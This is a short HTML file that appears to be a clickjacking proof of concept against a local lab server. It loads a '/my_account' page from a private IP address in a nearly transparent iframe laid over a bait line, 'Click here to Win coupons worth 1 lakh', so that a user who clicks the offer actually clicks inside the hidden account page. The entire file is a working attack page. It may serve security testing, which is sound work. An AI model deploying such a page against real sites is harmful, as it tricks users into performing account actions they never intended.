<!DOCTYPE html>
<html>
<head>
</head>
 <body>
    <style>
        iframe {
            position:relative;
            width:500px;
            height: 700px;
            opacity: 0.1;
            z-index: 2;
        }
        div {
            position:absolute;
            top:227px;
            left:26px;
            z-index: 1;
        }
    </style>
    <div>Click here to Win coupons worth 1 lakh </div>
    <iframe src="http://192.168.29.189:8090/my_account"></iframe>
  </script>
 </body>
</html>